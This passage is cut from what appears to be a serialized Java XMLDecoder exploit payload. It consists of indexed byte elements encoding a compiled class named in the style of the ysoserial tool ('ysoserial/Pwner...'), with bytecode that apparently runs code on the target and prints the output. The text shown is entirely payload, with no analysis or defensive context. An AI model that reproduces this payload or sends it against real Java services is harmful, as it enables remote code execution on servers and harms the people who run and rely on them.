index="3214"><byte>105</byte></void><void index="3215"><byte>111</byte></void><void index="3216"><byte>110</byte></void><void index="3217"><byte>7</byte></void><void index="3218"><byte>0</byte></void><void index="3219"><byte>-90</byte></void><void index="3220"><byte>1</byte></void><void index="3221"><byte>0</byte></void><void index="3222"><byte>3</byte></void><void index="3223"><byte>111</byte></void><void index="3224"><byte>117</byte></void><void index="3225"><byte>116</byte></void><void index="3226"><byte>1</byte></void><void index="3227"><byte>0</byte></void><void index="3228"><byte>21</byte></void><void index="3229"><byte>76</byte></void><void index="3230"><byte>106</byte></void><void index="3231"><byte>97</byte></void><void index="3232"><byte>118</byte></void><void index="3233"><byte>97</byte></void><void index="3234"><byte>47</byte></void><void index="3235"><byte>105</byte></void><void index="3236"><byte>111</byte></void><void index="3237"><byte>47</byte></void><void index="3238"><byte>80</byte></void><void index="3239"><byte>114</byte></void><void index="3240"><byte>105</byte></void><void index="3241"><byte>110</byte></void><void index="3242"><byte>116</byte></void><void index="3243"><byte>83</byte></void><void index="3244"><byte>116</byte></void><void index="3245"><byte>114</byte></void><void index="3246"><byte>101</byte></void><void index="3247"><byte>97</byte></void><void index="3248"><byte>109</byte></void><void index="3249"><byte>59</byte></void><void index="3250"><byte>12</byte></void><void index="3251"><byte>0</byte></void><void index="3252"><byte>-88</byte></void><void index="3253"><byte>0</byte></void><void index="3254"><byte>-87</byte></void><void index="3255"><byte>9</byte></void><void index="3256"><byte>0</byte></void><void index="3257"><byte>107</byte></void><void index="3258"><byte>0</byte></void><void index="3259"><byte>-86</byte></void><void index="3260"><byte>1</byte></void><void index="3261"><byte>0</byte></void><void index="3262"><byte>19</byte></void><void index="3263"><byte>106</byte></void><void index="3264"><byte>97</byte></void><void index="3265"><byte>118</byte></void><void index="3266"><byte>97</byte></void><void index="3267"><byte>47</byte></void><void index="3268"><byte>108</byte></void><void index="3269"><byte>97</byte></void><void index="3270"><byte>110</byte></void><void index="3271"><byte>103</byte></void><void index="3272"><byte>47</byte></void><void index="3273"><byte>84</byte></void><void index="3274"><byte>104</byte></void><void index="3275"><byte>114</byte></void><void index="3276"><byte>111</byte></void><void index="3277"><byte>119</byte></void><void index="3278"><byte>97</byte></void><void index="3279"><byte>98</byte></void><void index="3280"><byte>108</byte></void><void index="3281"><byte>101</byte></void><void index="3282"><byte>7</byte></void><void index="3283"><byte>0</byte></void><void index="3284"><byte>-84</byte></void><void index="3285"><byte>10</byte></void><void index="3286"><byte>0</byte></void><void index="3287"><byte>-83</byte></void><void index="3288"><byte>0</byte></void><void index="3289"><byte>91</byte></void><void index="3290"><byte>1</byte></void><void index="3291"><byte>0</byte></void><void index="3292"><byte>19</byte></void><void index="3293"><byte>106</byte></void><void index="3294"><byte>97</byte></void><void index="3295"><byte>118</byte></void><void index="3296"><byte>97</byte></void><void index="3297"><byte>47</byte></void><void index="3298"><byte>105</byte></void><void index="3299"><byte>111</byte></void><void index="3300"><byte>47</byte></void><void index="3301"><byte>80</byte></void><void index="3302"><byte>114</byte></void><void index="3303"><byte>105</byte></void><void index="3304"><byte>110</byte></void><void index="3305"><byte>116</byte></void><void index="3306"><byte>83</byte></void><void index="3307"><byte>116</byte></void><void index="3308"><byte>114</byte></void><void index="3309"><byte>101</byte></void><void index="3310"><byte>97</byte></void><void index="3311"><byte>109</byte></void><void index="3312"><byte>7</byte></void><void index="3313"><byte>0</byte></void><void index="3314"><byte>-81</byte></void><void index="3315"><byte>1</byte></void><void index="3316"><byte>0</byte></void><void index="3317"><byte>7</byte></void><void index="3318"><byte>112</byte></void><void index="3319"><byte>114</byte></void><void index="3320"><byte>105</byte></void><void index="3321"><byte>110</byte></void><void index="3322"><byte>116</byte></void><void index="3323"><byte>108</byte></void><void index="3324"><byte>110</byte></void><void index="3325"><byte>12</byte></void><void index="3326"><byte>0</byte></void><void index="3327"><byte>-79</byte></void><void index="3328"><byte>0</byte></void><void index="3329"><byte>71</byte></void><void index="3330"><byte>10</byte></void><void index="3331"><byte>0</byte></void><void index="3332"><byte>-80</byte></void><void index="3333"><byte>0</byte></void><void index="3334"><byte>-78</byte></void><void index="3335"><byte>1</byte></void><void index="3336"><byte>0</byte></void><void index="3337"><byte>15</byte></void><void index="3338"><byte>112</byte></void><void index="3339"><byte>114</byte></void><void index="3340"><byte>105</byte></void><void index="3341"><byte>110</byte></void><void index="3342"><byte>116</byte></void><void index="3343"><byte>83</byte></void><void index="3344"><byte>116</byte></void><void index="3345"><byte>97</byte></void><void index="3346"><byte>99</byte></void><void index="3347"><byte>107</byte></void><void index="3348"><byte>84</byte></void><void index="3349"><byte>114</byte></void><void index="3350"><byte>97</byte></void><void index="3351"><byte>99</byte></void><void index="3352"><byte>101</byte></void><void index="3353"><byte>12</byte></void><void index="3354"><byte>0</byte></void><void index="3355"><byte>-76</byte></void><void index="3356"><byte>0</byte></void><void index="3357"><byte>11</byte></void><void index="3358"><byte>10</byte></void><void index="3359"><byte>0</byte></void><void index="3360"><byte>-83</byte></void><void index="3361"><byte>0</byte></void><void index="3362"><byte>-75</byte></void><void index="3363"><byte>1</byte></void><void index="3364"><byte>0</byte></void><void index="3365"><byte>13</byte></void><void index="3366"><byte>83</byte></void><void index="3367"><byte>116</byte></void><void index="3368"><byte>97</byte></void><void index="3369"><byte>99</byte></void><void index="3370"><byte>107</byte></void><void index="3371"><byte>77</byte></void><void index="3372"><byte>97</byte></void><void index="3373"><byte>112</byte></void><void index="3374"><byte>84</byte></void><void index="3375"><byte>97</byte></void><void index="3376"><byte>98</byte></void><void index="3377"><byte>108</byte></void><void index="3378"><byte>101</byte></void><void index="3379"><byte>1</byte></void><void index="3380"><byte>0</byte></void><void index="3381"><byte>29</byte></void><void index="3382"><byte>121</byte></void><void index="3383"><byte>115</byte></void><void index="3384"><byte>111</byte></void><void index="3385"><byte>115</byte></void><void index="3386"><byte>101</byte></void><void index="3387"><byte>114</byte></void><void index="3388"><byte>105</byte></void><void index="3389"><byte>97</byte></void><void index="3390"><byte>108</byte></void><void index="3391"><byte>47</byte></void><void index="3392"><byte>80</byte></void><void index="3393"><byte>119</byte></void><void index="3394"><byte>110</byte></void><void index="3395"><byte>101</byte></void><void index="3396"><byte>114</byte></void><void index="3397"><byte>52</byte></void><void index="3398"><byte>53</byte></void><void index="3399"><byte>52</byte></void><void index="3400"><byte>51</byte></void><void index="3401"><byte>56</byte></void><void index="3402"><byte>51</byte></void><void index="3403"><byte>49</byte></void><void index="3404"><byte>52</byte></void><void index="3405"><byte>50</byte></void><void index="3406"><byte>55</byte></void><void index="3407"><byte>56</byte></void><void index="3408"><byte>57</byte></void><void index="3409"><byte>57</byte></void><void index="3410"><byte>50</byte></void><void index="3411"><byte>1</byte></void><void index="3412"><byte>0</byte></void><void index="3413"><byte>31</byte></void><void index="3414"><byte>76</byte></void><void index="3415"><byte>121</byte></void><void index="3416"><byte>115</byte></void><void index="3417"><byte>111</byte></void><void index="3418"><byte>115</byte></void><void index="3419"><byte>101</byte></void><void index="3420"><byte>114</byte></void><void index="3421"><byte>105</byte></void><void index="3422"><byte>97</byte></void><void index="3423"><byte>108</byte></void><void index="3424"><byte>47</byte></void><void index="3425"><byte>80</byte></void><void index="3426"><byte>119</byte></void><void index="3427"><byte>110</byte></void><void index="3428"><byte>101</byte></void><void index="3429"><byte>114</byte></void><void index="3430"><byte>52</byte></void><void index="3431"><byte>53</byte></void><void index="3432"><byte>52</byte></void><void index="3433"><byte>51</byte></void><void index="3434"><byte>56</byte></void><void index="3435"><byte>51</byte></void><void index="3436"><byte>49</byte></void><void index="3437"><byte>52</byte></void><void index="3438"><byte>50</byte></void><void index="3439"><byte>55</byte></void><void index="3440"><byte>56</byte></void><void index="3441"><byte>57</byte></void><void index="3442"><byte>57</byte></void><void index="3443"><byte>50</byte></void><void index="3444"><byte>59</byte></void><void index="3445"><byte>0</byte></void><void index="3446"><byte>33</byte></void><void index="3447"><byte>0</byte></void><void index="3448"><byte>2</byte></void><void index="3449"><byte>0</byte></void><void index="3450"><byte>3</byte></void><void index="3451"><byte>0</byte></void><void index="3452"><byte>1</byte></void><void index="3453"><byte>0</byte></void><void index="3454"><byte>4</byte></void><void index="3455"><byte>0</byte></void><void index="3456"><byte>1</byte></void><void index="3457"><byte>0</byte></void><void index="3458"><byte>26</byte></void><void index="3459"><byte>0</byte></void><void index="3460"><byte>5</byte></void><void index="3461"><byte>0</byte></void><void index="3462"><byte>6</byte></void><void index="3463"><byte>0</byte></void><void index="3464"><byte>1</byte></void><void index="3465"><byte>0</byte></void><void index="3466"><byte>7</byte></void><void index="3467"><byte>0</byte></void><void index="3468"><byte>0</byte></void><void index="3469"><byte>0</byte></void><void index="3470"><byte>2</byte></void><void index="3471"><byte>0</byte></void><void index="3472"><byte>8</byte></void><void index="3473"><byte>0</byte></void><void index="3474"><byte>4</byte></void><void index="3475"><byte>0</byte></void><void index="3476"><byte>1</byte></void><void index="3477"><byte>0</byte></void><void index="3478"><byte>10</byte></void><void index="3479"><byte>0</byte></void><void index="3480"><byte>11</byte></void><void index="3481"><byte>0</byte></void><void index="3482"><byte>1</byte></void><void index="3483"><byte>0</byte></void><void index="3484"><byte>12</byte></void><void index="3485"><byte>0</byte></void><void index="3486"><byte>0</byte></void><void index="3487"><byte>0</byte></void><void index="3488"><byte>47</byte></void><void index="3489"><byte>0</byte></void><void index="3490"><byte>1</byte></void><void index="3491"><byte>0</byte></void><void index="3492"><byte>1</byte></void><void index="3493"><byte>0</byte></void><void index="3494"><byte>0</byte></void><void index="3495"><byte>0</byte></void><void index="3496"><byte>5</byte></void><void index="3497"><byte>42</byte></void><void index="3498"><byte>-73</byte></void><void index="3499"><byte>0</byte></void><void index="3500"><byte>1</byte></void><void index="3501"><byte>-79</byte></void><void index="3502"><byte>0</byte></void><void index="3503"><byte>0</byte></void><void index="3504"><byte>0</byte></void><void index="3505"><byte>2</byte></void><void index="3506"><byte>0</byte></void><void index="3507"><byte>13</byte></void><void index="3508"><byte>0</byte></void><void index="3509"><byte>0</byte></void><void index="3510"><byte>0</byte></void><void index="3511"><byte>6</byte></void><void index="3512"><byte>0</byte></void><void index="3513"><byte>1</byte></void><void index="3514"><byte>0</byte></void><void index="3515"><byte>0</byte></void><void index="3516"><byte>0</byte></void><void index="3517"><byte>47</byte></void><void index="3518"><byte>0</byte></void><void index="3519"><byte>14</byte></void><void index="3520"><byte>0</byte></void><void index="3521"><byte>0</byte></void><void index="3522"><byte>0</byte></void><void index="3523"><byte>12</byte></void><void index="3524"><byte>0</byte></void><void index="3525"><byte>1</byte></void><void index="3526"><byte>0</byte></void><void index="3527"><byte>0</byte></void><void index="3528"><byte>0</byte></void><void index="3529"><byte>5</byte></void><void index="3530"><byte>0</byte></void><void index="3531"><byte>15</byte></void><void index="3532"><byte>0</byte></void><void index="3533"><byte>-71</byte></void><void index="3534"><byte>0</byte></void><void index="3535"><byte>0</byte></void><void index="3536"><byte>0</byte></void><void index="3537"><byte>1</byte></void><void index="3538"><byte>0</byte></void><void index="3539"><byte>19</byte></void><void index="3540"><byte>0</byte></void><void index="3541"><byte>20</byte></void><void index="3542"><byte>0</byte></void><void index="3543"><byte>2</byte></void><void index="3544"><byte>0</byte></void><void index="3545"><byte>12</byte></void><void index="3546"><byte>0</byte></void><void index="3547"><byte>0</byte></void><void index="3548"><byte>0</byte></void><void index="3549"><byte>63</byte></void><void index="3550"><byte>0</byte></void><void index="3551"><byte>0</byte></void><void index="3552"><byte>0</byte></void><void index="3553"><byte>3</byte></void><void index="3554"><byte>0</byte></void><void index="3555"><byte>0</byte></void><void index="3556"><byte>0</byte></void><void index="3557"><byte>1</byte></void><void index="3558"><byte>-79</byte></void><void index="3559"><byte>0</byte></void><void index="3560"><byte>0</byte></void><void index="3561"><byte>0</byte></void><void index="3562"><byte>2</byte></void><void index="3563"><byte>0</byte></void><void index="3564"><byte>13</byte></void><void index="3565"><byte>0</byte></void><void index="3566"><byte>0</byte></void><void index="3567"><byte>0</byte></void><void index="3568"><byte>6</byte></void><void index="3569"><byte>0</byte></void><void index="3570"><byte>1</byte></void><void index="3571"><byte>0</byte></void><void index="3572"><byte>0</byte></void><void index="3573"><byte>0</byte></void><void index="3574"><byte>52</byte></void><void index="3575"><byte>0</byte></void><void index="3576"><byte>14</byte></void><void index="3577"><byte>0</byte></void><void index="3578"><byte>0</byte></void><void index="3579"><byte>0</byte></void><void index="3580"><byte>32</byte></void><void index="3581"><byte>0</byte></void><void index="3582"><byte>3</byte></void><void index="3583"><byte>0</byte></void><void index="3584"><byte>0</byte></void><void index="3585"><byte>0</byte></void><void index="3586"><byte>1</byte></void><void index="3587"><byte>0</byte></void><void index="3588"><byte>15</byte></void><void index="3589"><byte>0</byte></void><void index="3590"><byte>-71</byte></void><void index="3591"><byte>0</byte></void><void index="3592"><byte>0</byte></void><void index="3593"><byte>0</byte></void><void index="3594"><byte>0</byte></void><void index="3595"><byte>0</byte></void><void index="3596"><byte>1</byte></void><void index="3597"><byte>0</byte></void><void index="3598"><byte>21</byte></void><void index="3599"><byte>0</byte></void><void index="3600"><byte>22</byte></void><void index="3601"><byte>0</byte></void><void index="3602"><byte>1</byte></void><void index="3603"><byte>0</byte></void><void index="3604"><byte>0</byte></void><void index="3605"><byte>0</byte></void><void index="3606"><byte>1</byte></void><void index="3607"><byte>0</byte></void><void index="3608"><byte>23</byte></void><void index="3609"><byte>0</byte></void><void index="3610"><byte>24</byte></void><void index="3611"><byte>0</byte></void><void index="3612"><byte>2</byte></void><void index="3613"><byte>0</byte></void><void index="3614"><byte>25</byte></void><void index="3615"><byte>0</byte></void><void index="3616"><byte>0</byte></void><void index="3617"><byte>0</byte></void><void index="3618"><byte>4</byte></void><void index="3619"><byte>0</byte></void><void index="3620"><byte>1</byte></void><void index="3621"><byte>0</byte></void><void index="3622"><byte>26</byte></void><void index="3623"><byte>0</byte></void><void index="3624"><byte>1</byte></void><void index="3625"><byte>0</byte></void><void index="3626"><byte>19</byte></void><void index="3627"><byte>0</byte></void><void index="3628"><byte>27</byte></void><void index="3629"><byte>0</byte></void><void index="3630"><byte>2</byte></void><void index="3631"><byte>0</byte></void><void index="3632"><byte>12</byte></void><void index="3633"><byte>0</byte></void><void index="3634"><byte>0</byte></void><void index="3635"><byte>0</byte></void><void index="3636"><byte>73</byte></void><void index="3637"><byte>0</byte></void><void index="3638"><byte>0</byte></void><void index="3639"><byte>0</byte></void><void index="3640"><byte>4</byte></void><void index="3641"><byte>0</byte></void><void index="3642"><byte>0</byte></void><void index="3643"><byte>0</byte></void><void index="3644"><byte>1</byte></void><void index="3645"><byte>-79</byte></void><void index="3646"><byte>0</byte></void><void index="3647"><byte>0</byte></void><void index="3648"><byte>0</byte></void><void index="3649"><byte>2</byte></void><void index="3650"><byte>0</byte></void><void index="3651"><byte>13</byte></void><void index="3652"><byte>0</byte></void><void index="3653"><byte>0</byte></void><void index="3654"><byte>0</byte></void><void index="3655"><byte>6</byte></void><void index="3656"><byte>0</byte></void><void index="3657"><byte>1</byte></void><void index="3658"><byte>0</byte></void><void index="3659"><byte>0</byte></void><void index="3660"><byte>0</byte></void><void index="3661"><byte>56</byte></void><void index="3662"><byte>0</byte></void><void index="3663"><byte>14</byte></void><void index="3664"><byte>0</byte></void><void index="3665"><byte>0</byte></void><void index="3666"><byte>0</byte></void><void index="3667"><byte>42</byte></void><void index="3668"><byte>0</byte></void><void index="3669"><byte>4</byte></void><void index="3670"><byte>0</byte></void><void index="3671"><byte>0</byte></void><void index="3672"><byte>0</byte></void><void index="3673"><byte>1</byte></void><void index="3674"><byte>0</byte></void><void index="3675"><byte>15</byte></void><void index="3676"><byte>0</byte></void><void index="3677"><byte>-71</byte></void><void index="3678"><byte>0</byte></void><void index="3679"><byte>0</byte></void><void index="3680"><byte>0</byte></void><void index="3681"><byte>0</byte></void><void index="3682"><byte>0</byte></void><void index="3683"><byte>1</byte></void><void index="3684"><byte>0</byte></void><void index="3685"><byte>21</byte></void><void index="3686"><byte>0</byte></void><void index="3687"><byte>22</byte></void><void index="3688"><byte>0</byte></void><void index="3689"><byte>1</byte></void><void index="3690"><byte>0</byte></void><void index="3691"><byte>0</byte></void><void index="3692"><byte>0</byte></void><void index="3693"><byte>1</byte></void><void index="3694"><byte>0</byte></void><void index="3695"><byte>28</byte></void><void index="3696"><byte>0</byte></void><void index="3697"><byte>29</byte></void><void index="3698"><byte>0</byte></void><void index="3699"><byte>2</byte></void><void index="3700"><byte>0</byte></void><void index="3701"><byte>0</byte></void><void index="3702"><byte>0</byte></void><void index="3703"><byte>1</byte></void><void index="3704"><byte>0</byte></void><void index="3705"><byte>30</byte></void><void index="3706"><byte>0</byte></void><void index="3707"><byte>31</byte></void><void index="3708"><byte>0</byte></void><void index="3709"><byte>3</byte></void><void index="3710"><byte>0</byte></void><void index="3711"><byte>25</byte></void><void index="3712"><byte>0</byte></void><void index="3713"><byte>0</byte></void><void index="3714"><byte>0</byte></void><void index="3715"><byte>4</byte></void><void index="3716"><byte>0</byte></void><void index="3717"><byte>1</byte></void><void index="3718"><byte>0</byte></void><void index="3719"><byte>26</byte></void><void index="3720"><byte>0</byte></void><void index="3721"><byte>8</byte></void><void index="3722"><byte>0</byte></void><void index="3723"><byte>41</byte></void><void index="3724"><byte>0</byte></void><void index="3725"><byte>11</byte></void><void index="3726"><byte>0</byte></void><void index="3727"><byte>1</byte></void><void index="3728"><byte>0</byte></void><void index="3729"><byte>12</byte></void><void index="3730"><byte>0</byte></void><void index="3731"><byte>0</byte></void><void index="3732"><byte>1</byte></void><void index="3733"><byte>114</byte></void><void index="3734"><byte>0</byte></void><void index="3735"><byte>7</byte></void><void index="3736"><byte>0</byte></void><void index="3737"><byte>11</byte></void><void index="3738"><byte>0</byte></void><void index="3739"><byte>0</byte></void><void index="3740"><byte>1</byte></void><void index="3741"><byte>18</byte></void><void index="3742"><byte>-89</byte></void><void index="3743"><byte>0</byte></void><void index="3744"><byte>3</byte></void><void index="3745"><byte>1</byte></void><void index="3746"><byte>76</byte></void><void index="3747"><byte>-72</byte></void><void index="3748"><byte>0</byte></void><void index="3749"><byte>47</byte></void><void index="3750"><byte>-64</byte></void><void index="3751"><byte>0</byte></void><void index="3752"><byte>49</byte></void><void index="3753"><byte>-74</byte></void><void index="3754"><byte>0</byte></void><void index="3755"><byte>53</byte></void><void index="3756"><byte>-64</byte></void><void index="3757"><byte>0</byte></void><void index="3758"><byte>55</byte></void><void index="3759"><byte>18</byte></void><void index="3760"><byte>57</byte></void><void index="3761"><byte>-74</byte></void><void index="3762"><byte>0</byte></void><void index="3763"><byte>61</byte></void><void index="3764"><byte>77</byte></void><void index="3765"><byte>-72</byte></void><void index="3766"><byte>0</byte></void><void index="3767"><byte>47</byte></void><void index="3768"><byte>-64</byte></void><void index="3769"><byte>0</byte></void><void index="3770"><byte>49</byte></void><void index="3771"><byte>-74</byte></void><void index="3772"><byte>0</byte></void><void index="3773"><byte>53</byte></void><void index="3774"><byte>-64</byte></void><void index="3775"><byte>0</byte></void><void index="3776"><byte>55</byte></void><void index="3777"><byte>-74</byte></void><void index="3778"><byte>0</byte></void><void index="3779"><byte>65</byte></void><void index="3780"><byte>78</byte></void><void index="3781"><byte>45</byte></void><void index="3782"><byte>18</byte></void><void index="3783"><byte>67</byte></void><void index="3784"><byte>-74</byte></void><void index="3785"><byte>0</byte></void><void index="3786"><byte>73</byte></void><void index="3787"><byte>45</byte></void><void index="3788"><byte>-74</byte></void><void index="3789"><byte>0</byte></void><void index="3790"><byte>77</byte></void><void index="3791"><byte>58</byte></void><void index="3792"><byte>4</byte></void><void index="3793"><byte>25</byte></void><void index="3794"><byte>4</byte></void><void index="3795"><byte>-69</byte></void><void index="3796"><byte>0</byte></void><void index="3797"><byte>79</byte></void><void index="3798"><byte>89</byte></void><void index="3799"><byte>-69</byte></void><void index="3800"><byte>0</byte></void><void index="3801"><byte>81</byte></void><void index="3802"><byte>89</byte></void><void index="3803"><byte>-73</byte></void><void index="3804"><byte>0</byte></void><void index="3805"><byte>82</byte></void><void index="3806"><byte>44</byte></void><void index="3807"><byte>-74</byte></void><void index="3808"><byte>0</byte></void><void index="3809"><byte>86</byte></void><void index="3810"><byte>18</byte></void><void index="3811"><byte>88</byte></void><void index="3812"><byte>-74</byte></void><void index="3813"><byte>0</byte></void><void index="3814"><byte>86</byte></void><void index="3815"><byte>-74</byte></void><void index="3816"><byte>0</byte></void><void index="3817"><byte>92</byte></void><void index="3818"><byte>-73</byte></void><void index="3819"><byte>0</byte></void><void index="3820"><byte>94</byte></void><void index="3821"><byte>-74</byte></void><void index="3822"><byte>0</byte></void><void index="3823"><byte>100</byte></void><void index="3824"><byte>25</byte></void><void index="3825"><byte>4</byte></void><void index="3826"><byte>-74</byte></void><void index="3827"><byte>0</byte></void><void index="3828"><byte>103</byte></void><void index="3829"><byte>18</byte></void><void index="3830"><byte>105</byte></void><void index="3831"><byte>-72</byte></void><void index="3832"><byte>0</byte></void><void index="3833"><byte>110</byte></void><void index="3834"><byte>58</byte></void><void index="3835"><byte>5</byte></void><void index="3836"><byte>25</byte></void><void index="3837"><byte>5</byte></void><void index="3838"><byte>1</byte></void><void index="3839"><byte>-91</byte></void><void index="3840"><byte>0</byte></void><void index="3841"><byte>16</byte></void><void index="3842"><byte>25</byte></void><void index="3843"><byte>5</byte></void><void index="3844"><byte>-74</byte></void><void index="3845"><byte>0</byte></void><void index="3846"><byte>115</byte></void><void index="3847"><byte>18</byte></void><void index="3848"><byte>117</byte></void><void index="3849"><byte>-74</byte></void><void index="3850"><byte>0</byte></void><void index="3851"><byte>121</byte></void><void index="3852"><byte>-102</byte></void><void index="3853"><byte>0</byte></void><void index="3854"><byte>6</byte></void><void index="3855"><byte>-89</byte></void><void index="3856"><byte>0</byte></void><void index="3857"><byte>33</byte></void><void index="3858"><byte>-72</byte></void><void index="3859"><byte>0</byte></void><void index="3860"><byte>127</byte></void><void index="3861"><byte>-69</byte></void><void index="3862"><byte>0</byte></void><void index="3863"><byte>81</byte></void><void index="3864"><byte>89</byte></void><void index="3865"><byte>-73</byte></void><void index="3866"><byte>0</byte></void><void index="3867"><byte>82</byte></void><void index="3868"><byte>18</byte></void><void index="3869"><byte>-127</byte></void><void index="3870"><byte>-74</byte></void><void index="3871"><byte>0</byte></void><void index="3872"><byte>86</byte></void><void index="3873"><byte>44</byte></void><void index="3874"><byte>-74</byte></void><void index="3875"><byte>0</byte></void><void index="3876"><byte>86</byte></void><void index="3877"><byte>-74</byte></void><void index="3878"><byte>0</byte></void><void index="3879"><byte>92</byte></void><void index="3880"><byte>-74</byte></void><void index="3881"><byte>0</byte></void><void index="3882"><byte>-123</byte></void><void index="3883"><byte>58</byte></void><void index="3884"><byte>6</byte></void><void index="3885"><byte>-89</byte></void><void index="3886"><byte>0</byte></void><void index="3887"><byte>30</byte></void><void index="3888"><byte>-72</byte></void><void index="3889"><byte>0</byte></void><void index="3890"><byte>127</byte></void><void index="3891"><byte>-69</byte></void><void index="3892"><byte>0</byte></void><void index="3893"><byte>81</byte></void><void index="3894"><byte>89</byte></void><void index="3895"><byte>-73</byte></void><void index="3896"><byte>0</byte></void><void index="3897"><byte>82</byte></void><void index="3898"><byte>18</byte></void><void index="3899"><byte>-121</byte></void><void index="3900"><byte>-74</byte></void><void index="3901"><byte>0</byte></void><void index="3902"><byte>86</byte></void><void index="3903"><byte>44</byte></void><void index="3904"><byte>-74</byte></void><void index="3905"><byte>0</byte></void><void index="3906"><byte>86</byte></void><void index="3907"><byte>-74</byte></void><void index="3908"><byte>0</byte></void><void index="3909"><byte>92</byte></void><void index="3910"><byte>-74</byte></void><void index="3911"><byte>0</byte></void><void index="3912"><byte>-123</byte></void><void index="3913"><byte>58</byte></void><void index="3914"><byte>6</byte></void><void index="3915"><byte>-69</byte></void><void index="3916"><byte>0</byte></void><void index="3917"><byte>-119</byte></void><void index="3918"><byte>89</byte></void><void index="3919"><byte>-69</byte></void><void index="3920"><byte>0</byte></void><void index="3921"><byte>-117</byte></void><void index="3922"><byte>89</byte></void><void index="3923"><byte>25</byte></void><void index="3924"><byte>6</byte></void><void index="3925"><byte>-74</byte></void><void index="3926"><byte>0</byte></void><void index="3927"><byte>-111</byte></void><void index="3928"><byte>18</byte></void><void index="3929"><byte>67</byte></void><void index="3930"><byte>-73</byte></void><void index="3931"><byte>0</byte></void><void index="3932"><byte>-108</byte></void><void index="3933"><byte>-73</byte></void><void index="3934"><byte>0</byte></void><void index="3935"><byte>-105</byte></void><void index="3936"><byte>58</byte></void><void index="3937"><byte>7</byte></void><void index="3938"><byte>1</byte></void><void index="3939"><byte>58</byte></void><void index="3940"><byte>8</byte></void><void index="3941"><byte>18</byte></void><void index="3942"><byte>-103</byte></void><void index="3943"><byte>58</byte></void><void index="3944"><byte>9</byte></void><void index="3945"><byte>-89</byte></void><void index="3946"><byte>0</byte></void><void index="3947"><byte>25</byte></void><void index="3948"><byte>-69</byte></void><void index="3949"><byte>0</byte></void><void index="3950"><byte>81</byte></void><void index="3951"><byte>89</byte></void><void index="3952"><byte>-73</byte></void><void index="3953"><byte>0</byte></void><void index="3954"><byte>82</byte></void><void index="3955"><byte>25</byte></void><void index="3956"><byte>9</byte></void><void index="3957"><byte>-74</byte></void><void index="3958"><byte>0</byte></void><void index="3959"><byte>86</byte></void><void index="3960"><byte>25</byte></void><void index="3961"><byte>8</byte></void><void index="3962"><byte>-74</byte></void><void index="3963"><byte>0</byte></void><void index="3964"><byte>86</byte></void><void index="3965"><byte>-74</byte></void><void index="3966"><byte>0</byte></void><void index="3967"><byte>92</byte></void><void index="3968"><byte>58</byte></void><void index="3969"><byte>9</byte></void><void index="3970"><byte>25</byte></void><void index="3971"><byte>7</byte></void><void index="3972"><byte>-74</byte></void><void index="3973"><byte>0</byte></void><void index="3974"><byte>-100</byte></void><void index="3975"><byte>89</byte></void><void index="3976"><byte>58</byte></void><void index="3977"><byte>8</byte></void><void index="3978"><byte>1</byte></void><void index="3979"><byte>-90</byte></void><void index="3980"><byte>-1</byte></void><void index="3981"><byte>-31</byte></void><void index="3982"><byte>45</byte></void><void index="3983"><byte>-74</byte></void><void index="3984"><byte>0</byte></void><void index="3985"><byte>-96</byte></void><void index="3986"><byte>25</byte></void><void index="3987"><byte>9</byte></void><void index="3988"><byte>-74</byte></void><void index="3989"><byte>0</byte></void><void index="3990"><byte>-91</byte></void><void index="3991"><byte>-89</byte></void><void index="3992"><byte>0</byte></void><void index="3993"><byte>24</byte></void><void index="3994"><byte>58</byte></void><void index="3995"><byte>10</byte></void><void index="3996"><byte>-78</byte></void><void index="3997"><byte>0</byte></void><void index="3998"><byte>-85</byte></void><void index="3999"><byte>25</byte></void><void index="4000"><byte>10</byte></void><void index="4001"><byte>-74</byte></void><void index="4002"><byte>0</byte></void><void index="4003"><byte>-82</byte></void><void index="4004"><byte>-74</byte></void><void index="4005"><byte>0</byte></void><void index="4006"><byte>-77</byte></void><void index="4007"><byte>25</byte></void><void index="4008"><byte>10</byte></void><void index="4009"><byte>-74</byte></void><void index="4010"><byte>0</byte></void><void index="4011"><byte>-74</byte></void><void index="4012"><byte>-89</byte></void><void index="4013"><byte>0</byte></void><void index="4014"><byte>3</byte></void><void index="4015"><byte>-79</byte></void><void index="4016"><byte>0</byte></void><void index="4017"><byte>1</byte></void><void index="4018"><byte>0</byte></void><void index="4019"><byte>94</byte></void><void index="4020"><byte>0</byte></void><void index="4021"><byte>-7</byte></void><void index="4022"><byte>0</byte></void><void index="4023"><byte>-4</byte></void><void index="4024"><byte>0</byte></void><void index="4025"><byte>-89</byte></void><void index="4026"><byte>0</byte></void><void index="4027"><byte>1</byte></void><void index="4028"><byte>0</byte></void><void index="4029"><byte>-73</byte></void><void index="4030"><byte>0</byte></void><void index="4031"><byte>0</byte></void><void index="4032"><byte>0</byte></void><void index="4033"><byte>70</byte></void><void index="4034"><byte>0</byte></void><void index="4035"><byte>9</byte></void><void index="4036"><byte>3</byte></void><void index="4037"><byte>-1</byte></void><void index="4038"><byte>0</byte></void><void index="4039"><byte>109</byte></void><void index="4040"><byte>0</byte></void><void index="4041"><byte>6</byte></void><void index="4042"><byte>0</byte></void><void index="4043"><byte>5</byte></void><void index="4044"><byte>7</byte></void><void index="4045"><byte>0</byte></void><void index="4046"><byte>112</byte></void><void index="4047"><byte>7</byte></void><void index="4048"><byte>0</byte></void><void index="4049"><byte>69</byte></void><void index="4050"><byte>7</byte></void><void index="4051"><byte>0</byte></void><void index="4052"><byte>96</byte></void><void index="4053"><byte>7</byte></void><void index="4054"><byte>0</byte></void><void index="4055"><byte>112</byte></void><void index="4056"><byte>0</byte></void><void index="4057"><byte>0</byte></void><void index="4058"><byte>2</byte></void><void index="4059"><byte>29</byte></void><void index="4060"><byte>-4</byte></void><void index="4061"><byte>0</byte></void><void index="4062"><byte>26</byte></void><void index="4063"><byte>7</byte></void><void index="4064"><byte>0</byte></void><void index="4065"><byte>-115</byte></void><void index="4066"><byte>-2</byte></void><void index="4067"><byte>0</byte></void><void index="4068"><byte>32</byte></void><void index="4069"><byte>7</byte></void><void index="4070"><byte>0</byte></void><void index="4071"><byte>-119</byte></void><void index="4072"><byte>7</byte></void><void index="4073"><byte>0</byte></void><void index="4074"><byte>112</byte></void><void index="4075"><byte>7</byte></void><void index="4076"><byte>0</byte></void><void index="4077"><byte>112</byte></void><void index="4078"><byte>21</byte></void><void index="4079"><byte>-1</byte></void><void index="4080"><byte>0</byte></void><void index="4081"><byte>23</byte></void><void index="4082"><byte>0</byte></void><void index="4083"><byte>6</byte></void><void index="4084"><byte>0</byte></void><void index="4085"><byte>5</byte></void><void index="4086"><byte>7</byte></void><void index="4087"><byte>0</byte></void><void index="4088"><byte>112</byte></void><void 